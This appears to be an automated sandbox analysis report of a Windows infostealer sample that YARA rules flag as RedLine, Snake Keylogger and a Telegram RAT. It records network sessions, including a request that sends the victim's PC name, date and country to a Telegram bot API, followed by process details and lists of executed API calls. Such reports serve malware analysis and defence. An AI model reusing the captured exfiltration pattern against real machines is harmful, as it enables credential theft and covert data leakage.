cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2016&rtt_var=760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1436301&cwnd=222&unsent_bytes=0&cid=8338ce9b9d79f69a&ts=188&x=0"
2025-01-08 15:34:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49720	188.114.96.3	443	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 15:34:17 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 15:34:18 UTC	853	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1665247 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GaWTA7H2tmGcmCtpxvf9tQmKBzOrGXi7MsWxZv27KSVrmu9EDqkxK%2BrC6CroGkA7qvGCNKSMlAbPniEWcTuWtGjSr2b6eLs7uh181d4FYePUMWH%2FDaY9vVKPjJ1Zo7Eu8XvMF7KP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fed403aea8e43d4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1610&rtt_var=615&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1813664&cwnd=224&unsent_bytes=0&cid=29031e3b6b75eb61&ts=192&x=0"
2025-01-08 15:34:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49722	149.154.167.220	443	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 15:34:18 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2008/01/2025%20/%2023:18:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-08 15:34:19 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 15:34:18 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-08 15:34:19 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	10:34:01
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\BgroUcYHpy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BgroUcYHpy.exe"
Imagebase:	0x250000
File size:	80'740'352 bytes
MD5 hash:	0EE994344A97494CB401AB3D5C8ADFC4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2057269694.0000000001360000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:34:04
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BgroUcYHpy.exe"
Imagebase:	0xbd0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.4483603541.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	7.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	192

Executed Functions

Function 00253B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00253B68
IsDebuggerPresent.KERNEL32 ref: 00253B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,003152F8,003152E0,?,?), ref: 00253BEB

Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06

Part of subcall function 0026092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00253C14,003152F8,?,?,?), ref: 0026096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00253C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00307770,00000010), ref: 0028D281
SetCurrentDirectoryW.KERNEL32(?,003152F8,?,?,?), ref: 0028D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00304260,003152F8,?,?,?), ref: 0028D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 0028D346

Part of subcall function 00253A46: GetSysColorBrush.USER32(0000000F), ref: 00253A50
Part of subcall function 00253A46: LoadCursorW.USER32(00000000,00007F00), ref: 00253A5F
Part of subcall function 00253A46: LoadIconW.USER32(00000063), ref: 00253A76
Part of subcall function 00253A46: LoadIconW.USER32(000000A4), ref: 00253A88
Part of subcall function 00253A46: LoadIconW.USER32(000000A2), ref: 00253A9A
Part of subcall function 00253A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00253AC0
Part of subcall function 00253A46: RegisterClassExW.USER32(?), ref: 00253B16

Part of subcall function 002539D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00253A03
Part of subcall function 002539D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00253A24
Part of subcall function 002539D5: ShowWindow.USER32(00000000,?,?), ref: 00253A38
Part of subcall function 002539D5: ShowWindow.USER32(00000000,?,?), ref: 00253A41

Part of subcall function 0025434A: _memset.LIBCMT ref: 00254370
Part of subcall function 0025434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00254415

Strings

%., xrefs: 00253C44
This is a third-party compiled AutoIt script., xrefs: 0028D279
runas, xrefs: 0028D33A

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%.
API String ID: 529118366-1956105530
Opcode ID: 9332150073f948f6401d29008412647c63eb2241bddef46cd16a171960ba1597
Instruction ID: 06258cd2555686946cd88dffaf2dba8b7f9e1a7e3c759af6b34b98c4a6328ae8
Opcode Fuzzy Hash: 9332150073f948f6401d29008412647c63eb2241bddef46cd16a171960ba1597
Instruction Fuzzy Hash: 6F512A31D65149EECF02EBB4EC059FD7778AF8D742F008466FC51A21A1CA70566ACF29

Function 002549A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 002549CD

Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06

GetCurrentProcess.KERNEL32(?,002DFAEC,00000000,00000000,?), ref: 00254A9A
IsWow64Process.KERNEL32(00000000), ref: 00254AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00254AE7
FreeLibrary.KERNEL32(00000000), ref: 00254AF2
GetSystemInfo.KERNEL32(00000000), ref: 00254B23
GetSystemInfo.KERNEL32(00000000), ref: 00254B2F

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: cd8fa14cbdfa3eda4a67fb68a1a8ad7bad4bb3c4e1a21d25cd31aa088176dcbc
Instruction ID: d95f96ff178e2d7f402c200ca2a93ab3a3cfbc0602ca4637fbbeede16797748d
Opcode Fuzzy Hash: cd8fa14cbdfa3eda4a67fb68a1a8ad7bad4bb3c4e1a21d25cd31aa088176dcbc
Instruction Fuzzy Hash: 3C9115359AA7C1DEC731EB6894501AAFFF4AF29305B04496ED4CB83A81D230E95CC71D

Function 00254E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00254D8E,?,?,00000000,00000000), ref: 00254E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00254D8E,?,?,00000000,00000000), ref: 00254EB0
LoadResource.KERNEL32(?,00000000,?,?,00254D8E,?,?,00000000,00000000,?,?,?,?,?,?,00254E2F), ref: 0028D937
SizeofResource.KERNEL32(?,00000000,?,?,00254D8E,?,?,00000000,00000000,?,?,?,?,?,?,00254E2F), ref: 0028D94C
LockResource.KERNEL32(00254D8E,?,?,00254D8E,?,?,00000000,00000000,?,?,?,?,?,?,00254E2F,00000000), ref: 0028D95F

Strings

SCRIPT, xrefs: 00254EA6

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 816192e4d9d301f34905e73c6df5b13263b490fb2c853e22b93ead8981930563
Instruction ID: e73698e0b96f023eeddb248f9f755e7f677296938bb72cb04374d23abe55a382
Opcode Fuzzy Hash: 816192e4d9d301f34905e73c6df5b13263b490fb2c853e22b93ead8981930563
Instruction Fuzzy Hash: 3B11BC70600301ABD7229F65EC49F27BBBAEBC5B01F14422DF80686290DB71EC048A24

Function 0025FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

%., xrefs: 0025FCF3
pb1, xrefs: 002949B9

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: BuffCharUpper
String ID: pb1$%.
API String ID: 3964851224-8071122
Opcode ID: c41ef576364554a79f640184bc269bfde1e82a291c65264b838f118e450c78fa
Instruction ID: f402e41bf585b1b17b310181c686d7bc432448a0bdbae6e1b445388ce99515ec
Opcode Fuzzy Hash: c41ef576364554a79f640184bc269bfde1e82a291c65264b838f118e450c78fa
Instruction Fuzzy Hash: 659259706283418FD720DF14C480B6BB7E5BF89304F14896DE88A9B351D775ECA9DB92

Function 0025E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Dd1, xrefs: 00293B2E
Dd1, xrefs: 00293AF5
Dd1, xrefs: 0025EABA
Dd1, xrefs: 0025EAC1
Variable must be of type 'Object'., xrefs: 00293E62

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID: Dd1$Dd1$Dd1$Dd1$Variable must be of type 'Object'.
API String ID: 0-908346732
Opcode ID: 9dd51a27550972b25c1da29d5c4c9530b4b222d8b96554d92815bc920894a532
Instruction ID: a043bd35ab5d7e6fea16f5db613513f6bee5e53b1c4ba1d2ba8abf8f898f5c02
Opcode Fuzzy Hash: 9dd51a27550972b25c1da29d5c4c9530b4b222d8b96554d92815bc920894a532
Instruction Fuzzy Hash: 33A28B74A20206CFCF28CF54C480AAAB7B5FF59315F258059EC059B351D774EE6ACB98

Function 002B445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0028E398), ref: 002B446A
FindFirstFileW.KERNELBASE(?,?), ref: 002B447B
FindClose.KERNEL32(00000000), ref: 002B448B

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 9090f8d3c1a809943e93cd1309883bdf7c1269ea82cbe95ea8e1dc61a758ab0e
Instruction ID: 6beb6790ada8d64729cf50dba9de00f2f41142c8767b223db713eda348279d54
Opcode Fuzzy Hash: 9090f8d3c1a809943e93cd1309883bdf7c1269ea82cbe95ea8e1dc61a758ab0e
Instruction Fuzzy Hash: 82E0D8328215016B42107B38FC4D4E9776CAE05375F200716F936C10D0E7B45D209599

Function 002609D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00260A5B
timeGetTime.WINMM ref: 00260D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00260E53
Sleep.KERNEL32(0000000A), ref: 00260E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00260EFA
DestroyWindow.USER32 ref: 00260F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00260F20
Sleep.KERNEL32(0000000A,?,?), ref: 00294E83
TranslateMessage.USER32(?), ref: 00295C60
DispatchMessageW.USER32(?), ref: 00295C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00295C82

Strings

pb1, xrefs: 00295003
@GUI_CTRLHANDLE, xrefs: 00294FE4
pb1, xrefs: 00294F59
@COM_EVENTOBJ, xrefs: 002954F0
pb1, xrefs: 002957B4
pb1, xrefs: 00294FAE
@GUI_WINHANDLE, xrefs: 00294F8F
@TRAY_ID, xrefs: 0029578F
@GUI_CTRLID, xrefs: 00294F3A

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb1$pb1$pb1$pb1
API String ID: 4212290369-2471073435
Opcode ID: 1faed5ca078d99f3bb0dcafdbcb139a6cf425e1c0219a711f9b72c4883957629
Instruction ID: 588014f2505952ae507c2d7bd650f5bda9966b3baffacf8ffaef8d2ee7334c31
Opcode Fuzzy Hash: 1faed5ca078d99f3bb0dcafdbcb139a6cf425e1c0219a711f9b72c4883957629
Instruction Fuzzy Hash: CDB2F670628752DFDB25DF24C885BABB7E4BF84304F14491DE94A97291CB70E8A4DF82

Function 002B9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002B8F5F: __time64.LIBCMT ref: 002B8F69

Part of subcall function 00254EE5: _fseek.LIBCMT ref: 00254EFD

__wsplitpath.LIBCMT ref: 002B9234

Part of subcall function 002740FB: __wsplitpath_helper.LIBCMT ref: 0027413B

_wcscpy.LIBCMT ref: 002B9247
_wcscat.LIBCMT ref: 002B925A
__wsplitpath.LIBCMT ref: 002B927F
_wcscat.LIBCMT ref: 002B9295
_wcscat.LIBCMT ref: 002B92A8

Part of subcall function 002B8FA5: _memmove.LIBCMT ref: 002B8FDE
Part of subcall function 002B8FA5: _memmove.LIBCMT ref: 002B8FED

_wcscmp.LIBCMT ref: 002B91EF

Part of subcall function 002B9734: _wcscmp.LIBCMT ref: 002B9824
Part of subcall function 002B9734: _wcscmp.LIBCMT ref: 002B9837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002B9452
_wcsncpy.LIBCMT ref: 002B94C5
DeleteFileW.KERNEL32(?,?), ref: 002B94FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002B9511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B9522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B9534

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
